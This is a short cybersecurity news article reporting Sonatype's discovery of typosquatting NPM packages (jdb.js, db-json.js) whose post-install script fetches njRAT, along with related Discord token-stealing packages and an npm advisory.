Constant Onslaught of Malicious NPM Packages Bundled With njRAT Malware

According to a Sonatype report, there’s a 430% increase in malicious code injection within open-source software (OSS) projects. Recently, cybercriminals have been seen using two malicious packages dubbed as jdb.js and db-json.js to deliver njRAT aka Bladabindi malware.

What’s new?

Sonatype’s security researcher Ax Sharma has found two malicious packages containing a malicious script that gets executed after web developers import and install any of the two malicious libraries.
  • Both packages described themselves as tools to help developers work with JSON files typically generated by database applications.
  • The jdb.js package attempts to mimic the legitimate NodeJS-based database library - jdb, and the db-json.js package carries an identical name to the genuine db-json library.
  • Furthermore, the post-install script of jdb.js attempts to download and run a file named patch.exe that further installs the njRAT.
  • Researchers have observed more than 100 downloads of these packages from the NPM package registry.

Recent NPM malware components

Several malware components such as discord.dll, discord.app, wsbd.js, ac-addon have been discovered that have already made headlines.
  • The most recent CursedGrabber campaign was associated with xpc.js malware that was stealing Discord tokens and sensitive user data by targeting Windows hosts.
  • Earlier, researchers had found two NPM packages, discord.dll and twilio-npm, executing nearly the same tasks with slight differences: stealing sensitive files from Discord application and browsers.

Wrapping up

The npm team has published a security advisory for these malicious codes. The emergence of counterfeit components suggests an occurrence of next-gen software supply chain attacks if adequate protections are not in place.

Cyware Publisher

Publisher

Cyware